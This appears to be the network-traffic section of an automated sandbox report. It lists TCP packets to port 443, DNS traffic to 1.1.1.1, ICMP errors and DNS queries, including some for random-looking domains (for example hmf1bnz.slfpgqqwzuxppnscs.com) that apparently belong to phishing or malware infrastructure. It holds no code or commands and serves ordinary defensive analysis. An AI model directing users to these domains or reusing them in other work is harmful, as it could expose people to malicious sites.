                                                                                                                                                                Nov 23, 2024 20:36:58.633728981 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.633738995 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.633743048 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.636214018 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.636298895 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.636399031 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.636548042 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.636578083 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.985991955 CET49826443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:58.986022949 CET4434982687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.986196041 CET49826443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:58.986366987 CET49826443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:58.986375093 CET4434982687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:59.861033916 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:59.861716986 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:59.861749887 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:59.862096071 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:59.862101078 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:59.945945978 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:59.946458101 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:59.946480036 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:59.946759939 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:59.946767092 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.246267080 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.246654987 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.246716976 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.247101068 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.247116089 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.300914049 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.301301003 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.301323891 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.301791906 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.301796913 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.334124088 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.334177017 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.334250927 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.334357977 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.334371090 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.334392071 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.334398031 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.336785078 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.336873055 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.336950064 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.337089062 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.337126017 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.393946886 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.394115925 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.394179106 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.394223928 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.394238949 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.394248962 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.394253969 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.396253109 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.396342039 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.396585941 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.396585941 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.396663904 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.447561026 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.447922945 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.447958946 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.448328972 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.448340893 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.681948900 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.682135105 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.682236910 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.682337999 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.682337999 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.682380915 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.682408094 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.684151888 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.684186935 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.684259892 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.684389114 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.684401989 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.747200012 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.747369051 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.747457981 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.747524977 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.747524977 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.747550011 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.747571945 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.749677896 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.749699116 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.749763012 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.749886990 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.749903917 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.826639891 CET4434982687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.827069998 CET49826443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:37:00.827080965 CET4434982687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.827676058 CET4434982687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.828155994 CET49826443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:37:00.828232050 CET4434982687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.828353882 CET49826443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:37:00.875338078 CET4434982687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.893629074 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.893697977 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.893851995 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.893902063 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.893902063 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.893948078 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.893973112 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.896015882 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.896029949 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:00.896105051 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.896230936 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:00.896243095 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:01.486928940 CET4434982687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:01.487143040 CET49826443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:37:01.487159014 CET4434982687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:01.487210989 CET49826443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:37:02.182826042 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.183440924 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.183490038 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.183954000 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.183969975 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.272962093 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.273390055 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.273428917 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.273984909 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.273992062 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.478328943 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.482270956 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.482300997 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.482763052 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.482769966 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.551141024 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.553755999 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.553786039 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.554331064 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.554337025 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.616564035 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.617162943 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.617189884 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.617587090 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.617592096 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.638520002 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.638598919 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.638664007 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.638853073 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.638900995 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.638932943 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.638950109 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.641505003 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.641599894 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.641694069 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.641792059 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.641807079 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.728569031 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.728713989 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.728780985 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.728960991 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.728980064 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.728997946 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.729003906 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.731375933 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.731416941 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.731484890 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.731587887 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.731597900 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.927927971 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.928118944 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.928294897 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.928294897 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.928294897 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.930454016 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.930509090 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:02.930586100 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.930696011 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:02.930715084 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.002361059 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.002521038 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.002609015 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.002634048 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.002645016 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.002659082 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.002664089 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.004673004 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.004709959 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.004784107 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.004895926 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.004909992 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.214251041 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.214445114 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.214515924 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.214771986 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.214787960 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.214801073 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.214806080 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.217807055 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.217844009 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.217916012 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.218101025 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.218112946 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:37:03.238831043 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:37:03.238840103 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Nov 23, 2024 20:35:41.655134916 CET53502441.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:41.669958115 CET53527571.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:42.712260008 CET6350453192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:42.717035055 CET5850153192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:42.849951029 CET53635041.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:42.945725918 CET53585011.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:44.530755043 CET53515831.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:45.594501019 CET6148753192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:45.594652891 CET6080153192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:45.737291098 CET53608011.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:45.737329960 CET53614871.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:46.437990904 CET6321953192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:46.438129902 CET5964053192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:46.835931063 CET53632191.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:46.836420059 CET53596401.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:48.290594101 CET6007453192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:48.290873051 CET6129253192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:48.428607941 CET53600741.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:48.428669930 CET53612921.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:52.263681889 CET5253153192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:52.263824940 CET5334953192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:52.675654888 CET53533491.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:52.675860882 CET53525311.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:56.852803946 CET4928453192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:56.853106976 CET5953953192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:57.075125933 CET53492841.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:57.089474916 CET53595391.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.087158918 CET5912253192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:59.087296963 CET6166753192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:59.092539072 CET53555461.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.224425077 CET53591221.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.330724955 CET53616671.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.339982033 CET5305453192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:59.340291023 CET6262553192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:59.341736078 CET5959253192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:59.341864109 CET5365153192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:59.342498064 CET5837753192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:59.342628002 CET4930753192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:35:59.512403011 CET53595921.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.512805939 CET53530541.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.512835979 CET53626251.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.512912035 CET53536511.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.512964964 CET53493071.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.513223886 CET53583771.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:35:59.821252108 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                Nov 23, 2024 20:36:01.400782108 CET53607321.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.482991934 CET5828753192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:01.483119965 CET5154653192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:01.597728968 CET6037853192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:01.598054886 CET5707753192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:01.640794992 CET53582871.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.641139030 CET53515461.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.773458958 CET53570771.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.773770094 CET53603781.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.829938889 CET6279153192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:01.830084085 CET5877553192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:02.036731958 CET53587751.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.040649891 CET53627911.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.431516886 CET53646221.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.464034081 CET6248953192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:02.464173079 CET5705953192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:02.612555027 CET53570591.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.620138884 CET53624891.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.020725012 CET5316253192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:03.020863056 CET5395653192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:03.164443016 CET53531621.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.231144905 CET53539561.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:05.179378033 CET5015653192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:05.179522991 CET5429553192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:05.319824934 CET53501561.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:05.320348978 CET53542951.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:07.382285118 CET6072953192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:07.382575035 CET5363653192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:07.524281979 CET53536361.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:07.535801888 CET53607291.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:20.411223888 CET53585691.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:22.524593115 CET5685153192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:22.524842978 CET6433053192.168.2.41.1.1.1
                                                                                                                                                                Nov 23, 2024 20:36:22.662782907 CET53643301.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:22.667718887 CET53568511.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.288114071 CET53554701.1.1.1192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:43.052565098 CET53609851.1.1.1192.168.2.4
                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                Nov 23, 2024 20:35:41.766010046 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
                                                                                                                                                                Nov 23, 2024 20:35:42.945796013 CET192.168.2.41.1.1.1c222(Port unreachable)Destination Unreachable
                                                                                                                                                                Nov 23, 2024 20:35:59.330792904 CET192.168.2.41.1.1.1c236(Port unreachable)Destination Unreachable
                                                                                                                                                                Nov 23, 2024 20:36:03.231370926 CET192.168.2.41.1.1.1c223(Port unreachable)Destination Unreachable
                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Nov 23, 2024 20:35:42.712260008 CET192.168.2.41.1.1.10xf7d2Standard query (0)www.google.co.krA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:42.717035055 CET192.168.2.41.1.1.10x8d9dStandard query (0)www.google.co.kr65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:45.594501019 CET192.168.2.41.1.1.10x948dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:45.594652891 CET192.168.2.41.1.1.10xf78eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:46.437990904 CET192.168.2.41.1.1.10x9683Standard query (0)hmf1bnz.slfpgqqwzuxppnscs.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:46.438129902 CET192.168.2.41.1.1.10x8949Standard query (0)hmf1bnz.slfpgqqwzuxppnscs.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:48.290594101 CET192.168.2.41.1.1.10x3e91Standard query (0)hmf1bnz.slfpgqqwzuxppnscs.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:48.290873051 CET192.168.2.41.1.1.10x2d2cStandard query (0)hmf1bnz.slfpgqqwzuxppnscs.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:52.263681889 CET192.168.2.41.1.1.10xb0fdStandard query (0)fdfxhdq0by6.xkndniwljldraoauu.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:52.263824940 CET192.168.2.41.1.1.10x7a2fStandard query (0)fdfxhdq0by6.xkndniwljldraoauu.com65IN (0x0001)false
